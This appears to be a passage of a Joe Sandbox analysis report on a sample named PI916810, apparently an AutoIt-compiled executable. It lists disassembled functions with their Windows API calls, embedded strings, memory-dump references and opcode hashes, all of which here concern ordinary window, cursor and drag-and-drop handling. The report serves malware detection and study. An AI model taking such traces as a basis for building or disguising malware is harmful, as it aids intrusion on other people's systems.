                                                                                                                                                                            • SetTimer.USER32(00000000,00000000,00000028,00461256), ref: 004629FC
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                                                            • String ID: AutoIt v3 GUI
                                                                                                                                                                            • API String ID: 1458621304-248962490
                                                                                                                                                                            • Opcode ID: 06a55b7e26007117944f9af064645c8eb17821534e4b5dc2505ab63370da682a
                                                                                                                                                                            • Instruction ID: 98533a7104da0ddfc4db3179280ba180d64a0eac92a8a77a4c5b3b2e2b2b3ab9
                                                                                                                                                                            • Opcode Fuzzy Hash: 06a55b7e26007117944f9af064645c8eb17821534e4b5dc2505ab63370da682a
                                                                                                                                                                            • Instruction Fuzzy Hash: E7B19371600249EFDB14DFA8DD85BAE7BB4FF08314F10422AFA15E7290DB789845CB59
                                                                                                                                                                            Function 004E4069 Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • CharUpperBuffW.USER32(?,?), ref: 004E40F6
                                                                                                                                                                            • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 004E41B6
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: BuffCharMessageSendUpper
                                                                                                                                                                            • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                                                            • API String ID: 3974292440-719923060
                                                                                                                                                                            • Opcode ID: df7ef4c5ed38dad87b2865a0d4deea9302bcc1d29c4fb007750a1cd027f0f8c4
                                                                                                                                                                            • Instruction ID: f2afb333487116a553c4e08380f060bba5d72aeea3fd15cdf7e1b9e3f8faa277
                                                                                                                                                                            • Opcode Fuzzy Hash: df7ef4c5ed38dad87b2865a0d4deea9302bcc1d29c4fb007750a1cd027f0f8c4
                                                                                                                                                                            • Instruction Fuzzy Hash: 5CA1B6303143419BDB14EF12C851A6EB7E5BF84318F14496EB8965B3D2EB78EC06CB5A
                                                                                                                                                                            Function 004D52F0 Relevance: 27.1, APIs: 18, Instructions: 124COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F89), ref: 004D5309
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F8A), ref: 004D5314
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 004D531F
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F03), ref: 004D532A
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F8B), ref: 004D5335
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F01), ref: 004D5340
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F81), ref: 004D534B
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F88), ref: 004D5356
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F80), ref: 004D5361
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F86), ref: 004D536C
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F83), ref: 004D5377
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F85), ref: 004D5382
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F82), ref: 004D538D
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F84), ref: 004D5398
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F04), ref: 004D53A3
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 004D53AE
                                                                                                                                                                            • GetCursorInfo.USER32(?), ref: 004D53BE
                                                                                                                                                                            • GetLastError.KERNEL32(00000001,00000000), ref: 004D53E9
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Cursor$Load$ErrorInfoLast
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3215588206-0
                                                                                                                                                                            • Opcode ID: 492bbc35f3c9ac852e790f30a9020b3ae670b04b3068063b89fd3e7e3305c7ab
                                                                                                                                                                            • Instruction ID: d35f7273ffff25dacc19c25531f5ac50f5489aa72fbb4dc246bb70218e59eab2
                                                                                                                                                                            • Opcode Fuzzy Hash: 492bbc35f3c9ac852e790f30a9020b3ae670b04b3068063b89fd3e7e3305c7ab
                                                                                                                                                                            • Instruction Fuzzy Hash: A4417370E043196ADB109FBA8C4996FFFF8EF51B10B10452FE509E7291DAB894018E65
                                                                                                                                                                            Function 004BAA64 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 004BAAA5
                                                                                                                                                                            • __swprintf.LIBCMT ref: 004BAB46
                                                                                                                                                                            • _wcscmp.LIBCMT ref: 004BAB59
                                                                                                                                                                            • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 004BABAE
                                                                                                                                                                            • _wcscmp.LIBCMT ref: 004BABEA
                                                                                                                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 004BAC21
                                                                                                                                                                            • GetDlgCtrlID.USER32(?), ref: 004BAC73
                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 004BACA9
                                                                                                                                                                            • GetParent.USER32(?), ref: 004BACC7
                                                                                                                                                                            • ScreenToClient.USER32(00000000), ref: 004BACCE
                                                                                                                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 004BAD48
                                                                                                                                                                            • _wcscmp.LIBCMT ref: 004BAD5C
                                                                                                                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 004BAD82
                                                                                                                                                                            • _wcscmp.LIBCMT ref: 004BAD96
                                                                                                                                                                              • Part of subcall function 0048386C: _iswctype.LIBCMT ref: 00483874
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                                                                                                                            • String ID: %s%u
                                                                                                                                                                            • API String ID: 3744389584-679674701
                                                                                                                                                                            • Opcode ID: 5367aba0c7ff7bc65599e55e1fb1174c86016ca931f356a05671d85ba79cbfc5
                                                                                                                                                                            • Instruction ID: b7ce65b4f6cbcd7ceceb3b39a930280b12053c7a3b5af873546e9f708c294393
                                                                                                                                                                            • Opcode Fuzzy Hash: 5367aba0c7ff7bc65599e55e1fb1174c86016ca931f356a05671d85ba79cbfc5
                                                                                                                                                                            • Instruction Fuzzy Hash: 07A1C271204346AFD714DF24C884BEBB7E9FF44315F00852EF9A982251D738E965CBAA
                                                                                                                                                                            Function 004BB397 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetClassNameW.USER32(00000008,?,00000400), ref: 004BB3DB
                                                                                                                                                                            • _wcscmp.LIBCMT ref: 004BB3EC
                                                                                                                                                                            • GetWindowTextW.USER32(00000001,?,00000400), ref: 004BB414
                                                                                                                                                                            • CharUpperBuffW.USER32(?,00000000), ref: 004BB431
                                                                                                                                                                            • _wcscmp.LIBCMT ref: 004BB44F
                                                                                                                                                                            • _wcsstr.LIBCMT ref: 004BB460
                                                                                                                                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 004BB498
                                                                                                                                                                            • _wcscmp.LIBCMT ref: 004BB4A8
                                                                                                                                                                            • GetWindowTextW.USER32(00000002,?,00000400), ref: 004BB4CF
                                                                                                                                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 004BB518
                                                                                                                                                                            • _wcscmp.LIBCMT ref: 004BB528
                                                                                                                                                                            • GetClassNameW.USER32(00000010,?,00000400), ref: 004BB550
                                                                                                                                                                            • GetWindowRect.USER32(00000004,?), ref: 004BB5B9
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                                                                                                            • String ID: @$ThumbnailClass
                                                                                                                                                                            • API String ID: 1788623398-1539354611
                                                                                                                                                                            • Opcode ID: 41f65130be26d25daacd1a9c5d8da541932ab2354cbf174567964b3b9039673b
                                                                                                                                                                            • Instruction ID: 3a40c3501193693a1821aa90f9aab060c356a832508a4505360964e24f743748
                                                                                                                                                                            • Opcode Fuzzy Hash: 41f65130be26d25daacd1a9c5d8da541932ab2354cbf174567964b3b9039673b
                                                                                                                                                                            • Instruction Fuzzy Hash: 9981B0710043059BDB10DF11C885FAB77E8FF44718F04856AFD858A192DBB8DD4ACBAA
                                                                                                                                                                            Function 004EC8EE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 181windowfileCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00462612: GetWindowLongW.USER32(?,000000EB), ref: 00462623
                                                                                                                                                                            • DragQueryPoint.SHELL32(?,?), ref: 004EC917
                                                                                                                                                                              • Part of subcall function 004EADF1: ClientToScreen.USER32(?,?), ref: 004EAE1A
                                                                                                                                                                              • Part of subcall function 004EADF1: GetWindowRect.USER32(?,?), ref: 004EAE90
                                                                                                                                                                              • Part of subcall function 004EADF1: PtInRect.USER32(?,?,004EC304), ref: 004EAEA0
                                                                                                                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 004EC980
                                                                                                                                                                            • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 004EC98B
                                                                                                                                                                            • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 004EC9AE
                                                                                                                                                                            • _wcscat.LIBCMT ref: 004EC9DE
                                                                                                                                                                            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 004EC9F5
                                                                                                                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 004ECA0E
                                                                                                                                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 004ECA25
                                                                                                                                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 004ECA47
                                                                                                                                                                            • DragFinish.SHELL32(?), ref: 004ECA4E
                                                                                                                                                                            • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 004ECB41
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                                                                                                            • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$prR
                                                                                                                                                                            • API String ID: 169749273-1452044432
                                                                                                                                                                            • Opcode ID: 03d18c309ae159fb54cd122445e010214820299535bda3a52e19a9b33a185f2a
                                                                                                                                                                            • Instruction ID: 156ff8b811eac96aeaa7e9e18befb12f72240b15050e83b3272306d71b95e48a
                                                                                                                                                                            • Opcode Fuzzy Hash: 03d18c309ae159fb54cd122445e010214820299535bda3a52e19a9b33a185f2a
                                                                                                                                                                            • Instruction Fuzzy Hash: CB61BD71108380AFC700DF65DC85D9FBBE8FF89714F000A2EF591961A2EB749A49CB56
                                                                                                                                                                            Function 004BB1E0 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __wcsnicmp
                                                                                                                                                                            • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                                                                                            • API String ID: 1038674560-1810252412
                                                                                                                                                                            • Opcode ID: ab43ea4c994506ed57bd04b3dd1bded29e8834475aaaac4771f5e90952497f5a
                                                                                                                                                                            • Instruction ID: 730592a2e9de5325f10901536e186da80e08b824469b9a61b21a5f574dbb3ce4
                                                                                                                                                                            • Opcode Fuzzy Hash: ab43ea4c994506ed57bd04b3dd1bded29e8834475aaaac4771f5e90952497f5a
                                                                                                                                                                            • Instruction Fuzzy Hash: F731C730604205A6EB18FA62CD67EEE7BA4EF10B54F60051FB441711D1FF996E04C5AE
                                                                                                                                                                            Function 004BC4C1 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • LoadIconW.USER32(00000063), ref: 004BC4D4
                                                                                                                                                                            • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 004BC4E6
                                                                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 004BC4FD
                                                                                                                                                                            • GetDlgItem.USER32(?,000003EA), ref: 004BC512
                                                                                                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 004BC518
                                                                                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 004BC528
                                                                                                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 004BC52E
                                                                                                                                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004BC54F
                                                                                                                                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 004BC569
                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 004BC572
                                                                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 004BC5DD
                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 004BC5E3
                                                                                                                                                                            • GetWindowRect.USER32(00000000), ref: 004BC5EA
                                                                                                                                                                            • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 004BC636
                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 004BC643
                                                                                                                                                                            • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 004BC668
                                                                                                                                                                            • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 004BC693
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3869813825-0
                                                                                                                                                                            • Opcode ID: da7b49cda4b754a6fa37d20c4d69756addb3041e08509121543615ceb353d109
                                                                                                                                                                            • Instruction ID: 5d82981eb987effe17824b8c7e910c92c513717dbe606dc0f0e6b6bf0e964fe5
                                                                                                                                                                            • Opcode Fuzzy Hash: da7b49cda4b754a6fa37d20c4d69756addb3041e08509121543615ceb353d109
                                                                                                                                                                            • Instruction Fuzzy Hash: 09516E70900709AFDB209FA8DDC5BAFBBF5FF04705F004929E686A66A1C774A905CB54
                                                                                                                                                                            Function 004EA428 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • _memset.LIBCMT ref: 004EA4C8
                                                                                                                                                                            • DestroyWindow.USER32(?,?), ref: 004EA542
                                                                                                                                                                              • Part of subcall function 00467D2C: _memmove.LIBCMT ref: 00467D66
                                                                                                                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 004EA5BC
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 004EA5DE
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 004EA5F1
                                                                                                                                                                            • DestroyWindow.USER32(00000000), ref: 004EA613
                                                                                                                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00460000,00000000), ref: 004EA64A
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 004EA663
                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 004EA67C
                                                                                                                                                                            • GetWindowRect.USER32(00000000), ref: 004EA683
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 004EA69B
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 004EA6B3
                                                                                                                                                                              • Part of subcall function 004625DB: GetWindowLongW.USER32(?,000000EB), ref: 004625EC
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                                                                                                            • String ID: 0$tooltips_class32
                                                                                                                                                                            • API String ID: 1297703922-3619404913
                                                                                                                                                                            • Opcode ID: 2842a5317bad1046401761321e3f240188156ac8721942d36172a92103b2593a
                                                                                                                                                                            • Instruction ID: d4b688bd441193bb89ab6c411aeb6aa7bfee78c4c30648a0fd892e62a3d77767
                                                                                                                                                                            • Opcode Fuzzy Hash: 2842a5317bad1046401761321e3f240188156ac8721942d36172a92103b2593a
                                                                                                                                                                            • Instruction Fuzzy Hash: 4171AD70140285AFD720CF29CC49F677BE5FB99304F08492EF985872A1D778E95ACB1A
                                                                                                                                                                            Function 004E4619 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • CharUpperBuffW.USER32(?,?), ref: 004E46AB
                                                                                                                                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 004E46F6
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: BuffCharMessageSendUpper
                                                                                                                                                                            • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                                                            • API String ID: 3974292440-4258414348
                                                                                                                                                                            • Opcode ID: fc3504ed98edd9b071dab944ad8f99ff19f9c4cd749ccf52b4beec464f2a3c77
                                                                                                                                                                            • Instruction ID: 6ee53692c1ded4b0ae3bbd828449120dd66b9a1e8f927099faf9d138e181c10f
                                                                                                                                                                            • Opcode Fuzzy Hash: fc3504ed98edd9b071dab944ad8f99ff19f9c4cd749ccf52b4beec464f2a3c77
                                                                                                                                                                            • Instruction Fuzzy Hash: 2691A4742043418BDB14EF22C451A6EB7E6BF84318F04485EF8955B3A2DB78ED4ACB5A
                                                                                                                                                                            Function 004CA0B5 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 156COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • LoadStringW.USER32(00000066,?,00000FFF,004EFB78), ref: 004CA0FC
                                                                                                                                                                              • Part of subcall function 00467F41: _memmove.LIBCMT ref: 00467F82
                                                                                                                                                                            • LoadStringW.USER32(?,?,00000FFF,?), ref: 004CA11E
                                                                                                                                                                            • __swprintf.LIBCMT ref: 004CA177
                                                                                                                                                                            • __swprintf.LIBCMT ref: 004CA190
                                                                                                                                                                            • _wprintf.LIBCMT ref: 004CA246
                                                                                                                                                                            • _wprintf.LIBCMT ref: 004CA264
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: LoadString__swprintf_wprintf$_memmove
                                                                                                                                                                            • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR$%O
                                                                                                                                                                            • API String ID: 311963372-2208342716
